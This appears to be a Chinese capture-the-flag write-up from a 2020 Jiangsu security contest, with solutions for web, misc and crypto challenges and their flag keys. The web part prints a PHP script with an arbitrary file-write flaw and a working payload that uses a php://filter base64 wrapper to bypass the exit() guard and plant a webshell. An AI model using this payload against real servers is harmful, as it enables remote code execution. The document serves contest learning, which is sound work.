2020 10 全国网络与信息安全管理职业技能大赛江苏场

Web

签到


php审计

<?php
$content = '<?php exit(0);?>';
$content .= @$_POST['code'];
$filename = @$_POST['filename'];
if (isset($filename)){
	file_put_contents($filename, $content);
}else{
	echo "今天天气不错";
}
?>

通过 base64 绕过 <?php exit(0);?>

code=PD9waHAgcGhwaW5mbygpID8+&filename=php://filter/write=convert.base64-decode/resource=1.php

接下来直接写shell即可


Misc

压缩包

打开zip文件 查看注释,发现密码为6位数字

使用软件爆破,密码是 732654

解压出来一个 111.zip 和一个 trips.txt

用winrar修复即可打开111.zip

查看 sh 内容发现 压缩包密码是时间戳

查看压缩包时间

构造时间戳字典

爆破

查看flag

key:F8CA0E5735CB2E6F


流量分析

直接解压得到流量包

过滤仅http

过滤http流量 ,然后 文件 》导出分组解析结果 》为CSV 保存为 123.txt

用 notepad++ 打开 123.txt,可以看到语句语句中还是夹杂着很多的 urlcode

Ctrl+A 全选 , 然后 插件 》MIME Tools 》 url decode ,这样就把 URLcode 转为更直观的 ascii 了

这个其实就是用二分法 进行 sql 盲注

前面代表是测试第几个 字符 后面代表 与当前测试的字符的 ascii 值 相比较的值

手动分析得出flag

key:a46dc78d0798c844


vmdk取证

直接用 R-Studio 打开vmdk文件,其中一个 txt 的内容 base64解一下就是flag


Crypto

RSA1

key:12e791ac27df4c99

RSA2

key:fe1c083f47ab4664